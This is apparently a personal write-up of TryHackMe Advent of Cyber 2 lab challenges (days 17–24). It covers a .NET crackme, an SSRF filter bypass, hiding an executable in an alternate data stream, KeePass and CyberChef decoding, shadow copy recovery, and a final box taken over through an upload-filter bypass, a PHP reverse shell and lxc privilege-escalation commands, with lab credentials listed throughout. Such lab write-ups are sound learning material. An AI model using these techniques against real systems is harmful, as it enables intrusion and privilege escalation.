What is the value of local_4h before eax is set to 0?
To solve this, I had to progress a couple steps ahead from my current breakpoint. I used the ds
to progress to the next step.
And with that, I'm done for this day. Reversing was one of my weakest spots. This challenge was really insightful and pushed me out of my comfort zone to learn a new reversing tool. Awesome challenge!
[Day 18] The Bits of Christmas
Reverse Engineering | GDB | Linux
"Silly Santa...Forgetting his password yet again!" complains Elf McEager. However, it is in fact Elf McEager who is silly for not creating a way to reset Santa's password for the TBFC dashboard.
Santa needs to get back into the dashboard for Christmas! Can you help Elf McEager reverse engineer TBFC's application to retrieve the password for Santa?!
RDP Creds
Username: cmnatic Password: Adventofcyber!
I was given an application that I was supposed to get around using reverse engineering. For this scenario, I could've either used ILSpy or Dotpeek. I went with the first option.
The application basically askes for a password and returns the following response if the entered string isn't matched.
Opening the target application with ILSpy
revealed the components the application was made of.
Upon, inspection I noticed that there's a class named crack me
. Thus, I decided to take a look at it closer.
Looking at the InitializeComponent()
function, I was able to see how the application was made and what takes place when the application is loaded on the user's screen.
From the InitializeComponent()
function, I was able to tell that this function named buttonActivate_Click()
was called when a user submits the password. So I started looking at the buttonActivate_Click()
function.
In the function, I was able to uncover both the password to the application and the flag! With that, day 18's challenge is over!
[Day 19] The Naughty or Nice List
Special by Tib3ruis| Web | SSRF
Santa has released a web app that lets the children of the world check whether they are currently on the naughty or nice list. Unfortunately, the elf who coded it exposed more things than she thought. Can you access the list administration and ensure that every child gets a present from Santa this year?
Target = 10.10.33.21
I was greeted with this webpage when accessing the machine via port 80. When a search is made, I realized that its processed with a proxy parameter in the URL as shown below.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho:8080/..
While taking a closer look, I realized that .hohoho
isn't a valid TLD on the internet. This led me to believe that it might be referencing a machine in the internal network.
So I tried to request the root of that particular internal web server using the following proxy parameter.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho:8080
The result returned a generic 404 error. However, this confirms that I was able to make the server request this modified URL
provided by me.
Next, I tried to make the server request another site. In this case, this particular site you are reading this on.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Fneeranjan%2..
URL Decoded= 10.10.33.21/?proxy=http://neeranjan.com
This was the response I got. The internal firewall had blocked me from accessing items outside of their network.
I was hit with the same error message when I tried to access locahost
. Thus, I concluded that they were only allowing access to domains starting with list.hohoho
. To bypass this, I could use DNS subdomains and create my own subdomain starting with list.hohoho
and point it to 127.0.0.1
which resolves localhost.
However, I would have to buy/reuse one of my domains and go through the hassle of setting up DNS records. Thus, I went with localtest.me! Check them out! localhost testing done right :)
Now that I had my payload theory ready, It was time to execute it. I encoded the URL as shown below.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho.local..
And there it was! The password to the admin page.
Upon deletion of the naughty list, I was awarded the flag!
This was definitely one of the more interesting web challenges. Managed to learn a thing or two thanks to Tib3rius.
[Day 20] PowershELlF to the rescue
Blue Teaming | Powershell
Someone is mischievous at The Best Festival Company. The contents within the stockings have been removed. A clue was left in one of the stockings that hints that the contents have been hidden within Elfstation1. McEager moves quickly and attempts to RDP into the machine. Yikes! He is unable to log in.
Luckily, he has been learning PowerShell, and he can remote into the workstation using PowerShell over SSH.Task: Use the PowerShell console to navigate throughout the endpoint to find the hidden contents to reveal what was hidden in the stockings.
SSH Creds
Username: mceager Password: r0ckStar!
Target = 10.10.163.212
The first thing I did was to SSH into the given windows box.
Once I was in, I launched PowerShell to complete the challenge.
Challenge 1
Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
Thus, I moved into the Documents
folder. To look for a hidden file, I used the -hidden
option together with the command Get-ChildItem
.
Now to see the contents, I used the cat
command similar to the Linux environment.
Challenge 2
Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder?
After much tweaking I ran the Get-childItem
command with the params -Hidden
, Directory
and -Filter "*3*"
. This meant that I was looking for a hidden directory within the \Windows
directory which had the number 3 anywhere in its name. That was all I needed for this challenge.
Challenge 3
How many words does the first file contain?
Thankfully, PowerShell has the cmdlet Measure-Object
which could help me out with this. I used the command with the param -Word
and solved this challenge.
And that was the end of day 20! Interesting day :) Got to learn a lil bit about PowerShell and how the cmdlets can be used!
[Day 21] Time for some ELForensics
Blue Teaming | Forensics
One of the 'little helpers' logged into his workstation only to realize that the database connector file has been replaced, and he can't find the naughty list anymore. Furthermore, upon executing the database connector file, a taunting message was displayed, hinting that the file was moved to another location. McEager has been notified, and he will put the pieces together to find the database connector file.
Task: Find where the database connector file is hidden using forensic-like investigative techniques.
RDP Creds
Username: littlehelper Password: iLove5now!
Challenge 1
Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
PS C:\Users\littlehelper\Documents> type '.\db file hash.txt'
I used this command to be able to read the file.
Challenge 2
What is the file hash of the mysterious executable within the Documents folder?
PS C:\Users\littlehelper\Documents> Get-FileHash -Algorithm MD5 .\deebee.exe
I used this command to be able to retrieve the MD5 hash of that particular file.
Challenge 3
Using Strings find the hidden flag within the executable?
PS C:\Users\littlehelper\Documents> C:\Tools\strings64.exe .\deebee.exe
Challenge 4
What is the flag that is displayed when you run the database connector file?
First, I needed to uncover any ADS deebee.exe
might have. I used the following command to find that.
PS C:\Users\littlehelper\Documents> Get-Item -Path .\deebee.exe -Stream *
This command revealed the hidedb
ADS. Next, to launch the hidden executable, I ran the following command
PS C:\Users\littlehelper\Documents> wmic process call create $(Resolve-Path .\deebee.exe:hidedb)
And there it was...The flag for the last challenge! Another interesting PowerShell challenge!
[Day 22] Elf McEager becomes CyberElf
Blue Teaming | Cyberchef | Encoding
The past few days there have been strange things happening at Best Festival Company. McEager hasn't had the time to fully investigate the compromised endpoints with everything that is going on nor does he have the time to reimage the workstations. McEager decides to log into a different workstation, one of his backup systems.
McEager logs in and to his dismay he can't log into his password manager. It's not accepting his master key! He notices that the folder name has been renamed to something strange.
Task: You must gain access to the password manager and decode the values within the password manager using CyberChef.
RDP Creds
Username: Administrator Password: sn0wF!akes!!!
Initial RDP reveals a file located on the desktop with what seems to be a base64
encoded file name. Thus, I went to over to my trusted site to decode that!
After decoding, I got the string thegrinchwashere
.
Upon further inspection, I realized that the folder contained an installation of the open source password manager, KeePass.
When I launched the password manager, I was prompted for a master password. This is where the string I found earlier came in handy. I entered thegrinchwashere
and I was let in by the application.
Now, I had access to all the passwords in the database!
The Elf Security System
has an unusually large notes section. Throwing that into Cyberchef and decoding that with the From Charcode
module, revealed the flag!
And that was end of day 22!
[Day 23] The Grinch strikes again!
Blue Teaming | Volume shadow copy service | Windows forensics
The mayhem at Best Festival Company continues. McEager receives numerous emails and phone calls about a possible ransomware attack affecting all the endpoints in the network. McEager knows that the endpoints which are infected with the malware don't have any backup copies but luckily on his workstation he has backups enabled.
Task: Investigate the malware and restore the files to their original
RDP Creds
Username: Administrator Password: sn0wF!akes!!!
This was what I was greeted with when I RDPd into the machine.
The Volume Shadow Copy Service (VSS) coordinates the actions that are required to create a consistent shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
Shadow Copy is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use.
The first thing I did was to check if there was any backups made. Thankfully there was a copy that was made to the backup drive as seen below.
Now that I found out that there were backups, I had to assign a drive letter and path to be able to access the drive via the file explorer.
Now, I was able to access the other backup drive and view its contents!
Challenge 1
What is the name of the suspicious scheduled task?
Challenge 2
Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
Challenge 3
There is another scheduled task that is related to VSS. What is the ShadowCopyVolume
ID?
Challenge 4
Assign the hidden partition a letter. What is the name of the hidden folder?
And...that was the end of that. Another cool little windows challenge educating on the Volume Shadow Copy Service!
[Day 24] The Trial Before Christmas
Special | Web | Linux
"Elf McEager - your boundless effort to save Christmas this year has not gone unnoticed. I wanted to reward you with a special present, however, there's a catch. Elf McSkidy and I have seen your skills advance and we feel it would only be appropriate to give you a present after one last challenge. Inside this package, you'll have also found a computer. Plug this into the network and hack into it. Best of luck and Merry Christmas - Santa"
Without delay, Elf McEager connected the NUC appropriately and watched it whir to life. A small screen nearby the power button blinked and then displayed the IP address assigned to the device. Next to the IP, a small symbol appeared. McEager quietly wondered to himself what it could mean as he logged into his terminal, ready to start his final challenge.
Target = 10.10.77.22
As always, I ran my NMAP scan against the target to gain more information.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day24] └─$ nmap -p- -T5 10.10.77.22
Challenge 1
What's the title of the hidden website?
Challenge 2
What is the name of the hidden php page?
For this challenge, I ran gobuster with the -x
option and set the flag to php
so that the program would only fuzz for php
pages!
┌──(nee㉿kali)-[~] └─$ gobuster dir -u http://10.10.77.22:65000 -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 40
uploads.php
Now that I had uncovered an upload page, I shifted my focus to try and upload a reverse shell to gain access!
Upon inspection of the source, I realized that the site only accepts .png
, .jpg
or .jpeg
. Thus, I fired up burpsuite
to bypass both the client side and possible server filtering!
I first headed to the interception rule and removed ^js$|
. This allows the proxy to intercept JS files too. By allowing intercept of JS files, I would be able to simply drop the filter js file which would help bypass the client side filtering.
Now, I'd simply be able to upload my php reverse shell and get gain access!
Next, I setup a NetCat listener on my host machine to catch any incomming connections from the server.
Followed by that, I went to the grid
directory which was uncovered earlier from the dirbuster attack. Which also happened to be where all uploaded files were stored. I then click on the file to trigger a reverse connection back to my host machine!
I also used python3 -c 'import pty;pty.spawn("/bin/bash")'
to spawn a better-featured bash shell after I was in.
Challenge 3
What is the value of the web.txt flag?
Continuing my post exploitation led me to find the DB authentication details in the web directory!
Now that I had access to the database, I went and took a peak inside. I managed to find a db named tron
and in that db was a table named users
with a single entry!
Challenge 4
Crack the password. What is it?
I then used this free password hash cracker to get the password!
Challenge 5
What is the value of the user.txt flag?
Now that I had the password for the user flynn
. I just su-ed into the account and grabbed the flag.
Challenge 6
What is the value of the root.txt flag?
I found that the user flynn was apart of the group lxc
. Thus, I went ahead and attempted privilege escalation via that service.
When running lxc image list
as shown below, I realized that the target machine already had an alpine v3.12
image available for me to just mount my root directory on to.
I then ran the following commands to create, mount the entire volume of the targer machine and initialize the container.
lxc init -c security.privileged=true
lxc config device add disk source=/ path=/mnt/root recursive=true
lxc start
lxc exec /bin/sh
End of day 24!
And that marks the end of the Advent of Cyber 2! That was a solid 24 day challenge 😊 I got to learn various things related to cyber security. Thanks to the folks over to THM and all other entities who made this event possible!
~Nee!